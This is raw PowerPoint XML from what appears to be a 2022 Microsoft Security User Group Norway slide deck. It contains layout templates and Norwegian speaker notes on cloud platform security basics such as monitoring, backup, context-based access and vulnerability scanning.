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672" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2076137547" r:id="rId7"/>
    <p:sldId id="2076137546" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="2076137544" r:id="rId10"/>
    <p:sldId id="1713476401" r:id="rId11"/>
    <p:sldId id="2076137519" r:id="rId12"/>
    <p:sldId id="1713476402" r:id="rId13"/>
    <p:sldId id="2076137517" r:id="rId14"/>
    <p:sldId id="2076137520" r:id="rId15"/>
    <p:sldId id="2076137542" r:id="rId16"/>
    <p:sldId id="2076137521" r:id="rId17"/>
    <p:sldId id="2076137523" r:id="rId18"/>
    <p:sldId id="2076137543" r:id="rId19"/>
    <p:sldId id="2076137545" r:id="rId20"/>
    <p:sldId id="2076137499" r:id="rId21"/>
    <p:sldId id="2076137514" r:id="rId22"/>
    <p:sldId id="2076137526" r:id="rId23"/>
    <p:sldId id="1713476346" r:id="rId24"/>
    <p:sldId id="2076137532" r:id="rId25"/>
    <p:sldId id="2076137535" r:id="rId26"/>
    <p:sldId id="2076137540" r:id="rId27"/>
    <p:sldId id="2076137524" r:id="rId28"/>
    <p:sldId id="2076137525" r:id="rId29"/>
    <p:sldId id="2076137537" r:id="rId30"/>
    <p:sldId id="2076137530" r:id="rId31"/>
    <p:sldId id="2076137528" r:id="rId32"/>
    <p:sldId id="2076137515" r:id="rId33"/>
    <p:sldId id="2076137522" r:id="rId34"/>
    <p:sldId id="2076137531" r:id="rId35"/>
    <p:sldId id="2076137534" r:id="rId36"/>
    <p:sldId id="25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5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E84371-0F7F-4E20-9368-CE1F3D7F4E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B9220-CBBF-49A8-A718-CD37BD6AC1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1065C-F328-487F-9334-3DF033EC693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DD2C8-2073-4CE3-B85B-17708C522D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BFA2A-981C-4548-9212-03194B489F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D42E7-F70E-4AE4-96C0-4ACA7BF3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8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E5509-AACF-416C-8F5B-A6D0AE3A4D4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5C3D1-F88A-4B0C-83C0-A26AD9A17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0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* Flere sårbarheter en før</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t>* Legge til felles kjøreregler på grunnmuren i plattformen </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Definere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>må</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>overvåkning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, backup, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>definerte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sikkerhetsmekanismer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert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 err="1"/>
              <a:t>Tilgang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>til</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenesten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> bade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sluttbruker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>utvikler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>basert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>på</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontekst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 err="1"/>
              <a:t>Benytte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontinuerlig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>oppdaterte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester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Ha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontinuerlig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sårbarheter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>applikasjonene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenesten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 err="1"/>
              <a:t>Overvåkning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> av </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester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 err="1"/>
              <a:t>Viktigste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>skyplatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>gir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er jo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>automatisering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>benyttes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for å </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> alle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>disse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>mekaniseme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>samt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>også</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bygging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> av </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>applikasjonen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. 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Med </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>disse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>mekanismene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bunn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>har</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> man et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>godt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>grunnlag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fremtidige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>blir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>på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skyplattform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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99E83D-10BD-4912-838C-C14C2B9472B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932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526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464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977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400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95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150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816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175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813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966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495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9E83D-10BD-4912-838C-C14C2B9472B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5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1CE9-E242-4896-9FEB-BE7F847FE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97DEA-7AF4-4B70-A5E5-8FA3A6165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3F5E-B020-452C-BB56-81BD6005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6981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D0E4BA55-9EBB-4D8A-927E-06E14CE18DE1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5D6AB-CAE0-43DF-8ED1-6A4A4922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AABEA-5F26-4EF4-96EF-4BC54742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B0B3-EBEB-4B48-A07D-AE47399A9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6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37EA-A4C3-4A0C-A0D9-34B4039F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A7FEE-330C-4521-A9D1-A8552744F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0602-D797-4C17-88AA-C45272A2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383CA5-0CD6-441A-8FA8-F052AC5C4D80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DD3BB-541D-41C6-A7E3-502866C2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C6715-C62A-40E8-9A7D-3E049A34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B0B3-EBEB-4B48-A07D-AE47399A9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2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1FEBF-D9A5-4137-B2CB-B7921FBF4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66CAD-66AA-475B-9DD5-08A76BD15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70B3-C0D1-4FDD-AE46-504F6D41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348E4D-393C-405E-8840-DF7D2B79E082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A9AEC-926F-4D7C-8DB2-7C379EB7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EA4C9-B28B-44D5-96FA-9D9206CF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B0B3-EBEB-4B48-A07D-AE47399A9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47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4A9F7-26C5-4694-A296-7076D5CEB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183" y="1587610"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="75600" tIns="75600" rIns="75600" bIns="75600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265113" indent="-265113">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="541338" indent="-276225">
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Text – Tahoma 18pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF43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7" y="739140"/>
            <a:ext cx="10751504" cy="546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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Title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30B3B81-CB18-49F2-A0E3-637EFF665D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="40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noProof="0"/>
              <a:t>Color of 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6BF4AE-C967-4346-99C5-1B876420959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="25200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697" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="810275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4A9F7-26C5-4694-A296-7076D5CEB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183" y="1587610"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="75600" tIns="75600" rIns="75600" bIns="75600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265113" indent="-265113">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="541338" indent="-276225">
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tekst – Tahoma 18pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Andre nivå</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF43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7" y="739140"/>
            <a:ext cx="10751504" cy="546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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tittel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30B3B81-CB18-49F2-A0E3-637EFF665D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="40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/>
              <a:t>Farge på tekst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6BF4AE-C967-4346-99C5-1B876420959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="25200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97" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1575607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itre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF43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7" y="739140"/>
            <a:ext cx="10751504" cy="546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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tittel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8FDEB22A-472A-4EFB-9D37-3E885FC987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53955" y="3897727"/>
            <a:ext cx="2702257" cy="162529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nb-NO" noProof="0"/>
              <a:t>Tekst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BD8886C-CD28-4C7E-A1D0-02B60479DF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43010" y="3897727"/>
            <a:ext cx="2702257" cy="162529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nb-NO" noProof="0"/>
              <a:t>Tekst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8F6531A9-C880-4BD2-88DC-96E543E74F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64899" y="3897727"/>
            <a:ext cx="2702257" cy="162529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>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tekst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B63F56F-903A-4270-A9B5-96A8437CCCC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="4080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/>
              <a:t>Farge på tekst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7B50B3-78D9-4804-90E1-0DBFB1B0DE5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="25200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97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44C25-DC6F-4E76-BA3E-745C0EEA4539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937469" y="2180422"/>
            <a:ext cx="1513338" cy="151333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nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her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D28B304-042B-4EC3-B8BD-9A9684FC2691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348414" y="2180422"/>
            <a:ext cx="1513338" cy="151333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nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her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458896F-4266-4991-A883-A25E4AE97C66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8759358" y="2180422"/>
            <a:ext cx="1513338" cy="151333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nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2687794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AA29E41-810D-40C7-B445-C9A3A42F92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574" y="485301"/>
            <a:ext cx="6454852" cy="646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1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0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7780" y="6412447"/>
            <a:ext cx="4114800" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28543BDC-0553-40FA-A4DB-EDAAA606CFF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8E6D7-BFE5-4AFE-A54F-B6EC40DE1127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr 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78C27-7F29-42FF-8C70-77F242BD9332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="10967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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway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42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21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3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0558-174B-41AF-B1EA-2441DFBA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2C7D1-935B-4E37-B381-2E871729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F1B83-C232-4006-A99E-3968AF25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DC5271-D635-40A1-89AA-F1F2949253CF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6E048-3007-4BD7-B5E8-BC718363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5060-5BEA-49EF-8292-6F986C99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B0B3-EBEB-4B48-A07D-AE47399A9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62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66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97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39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76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537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6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3E7FF3-8ADF-4096-A73C-46D62188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25" y="432332"/>
            <a:ext cx="5983950" cy="599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6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E518-2648-43D7-A7DD-2DDEA845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3C6EB-09A7-4D1D-BB40-DB2225D6F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692A1-D5C1-4A75-83FB-41B490CF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5C41AA-A707-4B7A-A0C6-1CBF05C48AD5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9903D-B302-4004-A615-C56E82F9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9D99-67B1-466A-AB52-EB8DC9C9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B0B3-EBEB-4B48-A07D-AE47399A9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76C1-FB66-42E2-B990-FD8B6CED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6973-C74F-4B71-8E22-6EF2C4E03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17A6F-4C10-4A2C-8649-AF3938461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476AE-E19C-4ACE-991D-BE4CE057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B63A9F-AFF2-49ED-93D3-0D279E0ADA05}" type="datetime1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D6D75-98F5-44AA-92DF-9EEC3387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0682A-03BF-45AD-AE3E-22D56955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B0B3-EBEB-4B48-A07D-AE47399A9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3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2D71-8C68-48F6-BDDE-ADB89508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B24E8-C03D-417E-AC47-BD635CBE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0E2B0-B8D0-4A71-A477-499955CBB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94943-B339-4310-83B5-CCF7171BF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3041E-222B-45DB-B3FF-B8BD085E7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92BEF-2BAD-4A40-9E03-21D86FFC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CA99DD-F39B-4B88-9832-EC3F6233D61E}" type="datetime1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9002C-E625-4E50-BF38-97792CC2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24807-5482-4AA7-85B7-B7B9CEFE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B0B3-EBEB-4B48-A07D-AE47399A9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6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6020-DCB3-4BBC-BA41-B6B2ECEB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9E865-451B-4A68-AB23-85191C8A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7EA3D5-1D0A-4AAE-8C6C-3041C3DD67A5}" type="datetime1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95286-45E7-4F54-91A8-191BE4CD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1E509-D2CE-4672-BCC0-ECA8BA8D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B0B3-EBEB-4B48-A07D-AE47399A9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58A67-1D3D-4011-A7BE-ECCA4F4D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0D923C-A005-43F3-BB99-6C67104DA11E}" type="datetime1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B258-A21F-414F-91A3-FA516892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0D6DB-A3ED-4360-B41A-31B2F208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B0B3-EBEB-4B48-A07D-AE47399A9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863A-3133-4C91-B37C-488EEDE4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3795-D59E-461E-99D6-D0AE7E7A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F2042-05D9-460B-9330-B18E1F6F6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93A19-4D08-438D-9CE3-1C17CE11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B18E7-42CE-46B5-B3DE-43643BB4E0CC}" type="datetime1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6D3B7-2E2E-437F-90FB-BECCABB7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B196D-ACE7-4151-AC06-C713B2F6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B0B3-EBEB-4B48-A07D-AE47399A9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F745-0833-4E7F-B058-3522F28B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3F3B8-C59B-4D03-AE36-0C2382B49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F3837-6717-4CA6-B678-AA9E4D82E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B7DBA-461C-4B69-91A2-1BB715EF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22ABF8-D40E-4899-B260-9C33CBDD01C3}" type="datetime1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7EE69-1985-4CCA-865C-A78238D6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8415A-8B2D-4C05-820F-04181E24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B0B3-EBEB-4B48-A07D-AE47399A9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3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hyperlink" Target="https://github.com/msugn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289ED-9384-4FD8-8FDB-2F648F0C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CDB63-D975-41DE-B9FF-A2FB5C83D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ECB48-FD42-4C38-9C21-22753FD63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37" y="6388775"/>
            <a:ext cx="523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B0B3-EBEB-4B48-A07D-AE47399A9A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F291514-9A8A-45FB-B653-501D3EF88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4420" y="6571338"/>
            <a:ext cx="3733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alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7175D263-F080-4A2E-B21E-FA2C306FF33D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/4/2022</a:t>
            </a:fld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F2F4164-70F9-4964-884C-0A05063DC21F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" y="5962808"/>
            <a:ext cx="893790" cy="8951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2F8DA0-C8EB-4087-8A49-F08B926AB541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359566" y="6574931"/>
            <a:ext cx="3284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noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>©2022 Microsoft Security User Group Norway All Rights Reserved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9AA5C7-D396-4791-8FEE-0586E66841A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10729932" y="6571337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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN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139E3-82DD-47A6-B599-A5B31101CEB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10257025" y="6427084"/>
            <a:ext cx="10967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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
